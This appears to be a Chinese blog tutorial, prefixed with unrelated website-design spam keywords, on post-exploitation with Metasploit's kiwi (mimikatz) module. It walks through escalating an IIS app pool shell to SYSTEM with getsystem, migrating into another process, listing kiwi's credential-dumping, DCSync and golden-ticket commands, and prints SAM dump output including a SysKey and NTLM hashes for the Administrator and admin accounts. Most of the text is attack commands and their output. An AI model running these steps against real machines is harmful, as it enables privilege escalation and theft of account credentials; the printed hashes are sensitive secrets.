容桂网站设计制作,西宁做网站最好的公司哪家好,网站开发流程进度表,网络服务器价格一、简介#xff1a;
kiwi模块#xff1a; mimikatz模块已经合并为kiwi模块#xff1b;使用kiwi模块需要system权限#xff0c;所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
二、前权#xff1a;
提权到system权限#xff1a; 1.1 提到system有…一、简介
kiwi模块 mimikatz模块已经合并为kiwi模块使用kiwi模块需要system权限所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
二、前权
提权到system权限 1.1 提到system有两个方法 一是当前的权限是administrator用户 二是利用其它手段先提权到administrator用户。然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限。 1.2 进行提权
getuid #查看当前会话用户身份
getsystem #自动尝试提权当前是普通权限
meterpreter getuid
Server username: IIS APPPOOL\web通过getsystem提权成功
meterpreter getsystem -t 6
...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA E fsPotato)).同通过ps查看进程
meterpreter psProcess List
PID PPID Name Arch Session User Path--- ---- ---- ---- ------- ---- ----0 0 [System Process]4 0 System x64 0300 4 smss.exe x64 0316 616 sqlservr.exe x64 0 NT SERVICE\MSSQLSERVER C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe328 616 vsvnhttpsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\VisualSVN Server\bin\vsvnhttpsvc.exe360 932 WUDFHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\WUDFHost.exe396 388 csrss.exe x64 0416 720 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe476 388 wininit.exe x64 0484 468 csrss.exe x64 1572 468 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe580 1104 taskhostw.exe x64 2 172_19_0_5\admin C:\Windows\System32\taskhostw.exe616 476 services.exe x64 0632 476 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe648 616 svchost.exe x64 2 172_19_0_5\admin C:\Windows\System32\svchost.exe720 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe784 616 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe880 572 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe888 572 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe924 616 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe932 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1020 616 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe1064 616 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe1096 616 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe1104 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1244 616 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe1264 616 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe1276 720 ChsIME.exe x64 2 172_19_0_5\admin C:\Windows\System32\InputMethod\CHS\ChsIME.exe1752 616 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe1820 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1864 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1892 616 BaradAgent.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\QCloud\Monitor\Barad\BaradAgent.exe1968 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe1992 616 sqlwriter.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe2000 616 sgagent.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\QCloud\Stargate\sgagent.exe2008 616 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe2020 616 tat_agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\QCloud\tat_agent\ta迁移进程
meterpreter migrate 3820
[*] Migrating from 5320 to 3820...
[*] Migration completed successfully.加载 load mimikatz
meterpreter load mimikatz
[!] The mimikatz extension has been replaced by kiwi. Please use this in future.
Loading extension kiwi....#####. mimikatz 2.2.0 20191125 (x64/windows).## ^ ##. A La Vie, A LAmour - (oe.eo)## / \ ## /*** Benjamin DELPY gentilkiwi ( benjamingentilkiwi.com )## \ / ## http://blog.gentilkiwi.com/mimikatz## v ## Vincent LE TOUX ( vincent.letouxgmail.com )##### http://pingcastle.com / http://mysmartlogon.com ***/Success.通过help kiwi 查看帮助
meterpreter help kiwiKiwi Commands
Command Description------- -----------creds_all Retrieve all credentials (parsed)creds_kerberos Retrieve Kerberos creds (parsed)creds_livessp Retrieve Live SSP credscreds_msv Retrieve LM/NTLM creds (parsed)creds_ssp Retrieve SSP credscreds_tspkg Retrieve TsPkg creds (parsed)creds_wdigest Retrieve WDigest creds (parsed)dcsync Retrieve user account information via DCSync (unparsed)dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSyncgolden_ticket_create Create a golden kerberos ticketkerberos_ticket_list List all kerberos tickets (unparsed)kerberos_ticket_purge Purge any in-use kerberos ticketskerberos_ticket_use Use a kerberos ticketkiwi_cmd Execute an arbitary mimikatz command (unparsed)lsa_dump_sam Dump LSA SAM (unparsed)lsa_dump_secrets Dump LSA secrets (unparsed)password_change Change the password/hash of a userwifi_list List wifi profiles/creds for the current userwifi_list_shared List shared wifi profiles/creds (requires SYSTEM)一些有关密码和凭据的命令
creds_all #列举所有凭据
creds_kerberos #列举所有kerberos凭据
creds_msv #列举所有msv凭据
creds_ssp #列举所有ssp凭据
creds_tspkg #列举所有tspkg凭据
creds_wdigest #列举所有wdigest凭据
dcsync #通过DCSync检索用户帐户信息
dcsync_ntlm #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create #创建黄金票据
kerberos_ticket_list #列举kerberos票据
kerberos_ticket_purge #清除kerberos票据
kerberos_ticket_use #使用kerberos票据
kiwi_cmd #执行mimikatz的命令后面接mimikatz.exe的命令
lsa_dump_sam #dump出lsa的SAM
lsa_dump_secrets #dump出lsa的密文
password_change #修改密码
wifi_list #列出当前用户的wifi配置文件
wifi_list_shared #列出共享wifi配置文件/编码直接拿到
meterpreter lsa_dump_sam
[] Running as SYSTEM
[*] Dumping SAM
Domain : 172_19_0_5
SysKey : 6a1d3295e5ce0aa1eb9871750b8a0942
Local SID : S-1-5-21-3925609119-1055855973-2504285507SAMKey : a7560bed1540bf80158f27e92e672d72RID : 000001f4 (500)
User : AdministratorHash NTLM: 3f10b4bc33875a54c357b013abdbbb6eRID : 000001f5 (501)
User : GuestRID : 000001f7 (503)
User : DefaultAccountRID : 000003f1 (1009)
User : adminHash NTLM: 4b37422333f67ebc8778d798ad2af741
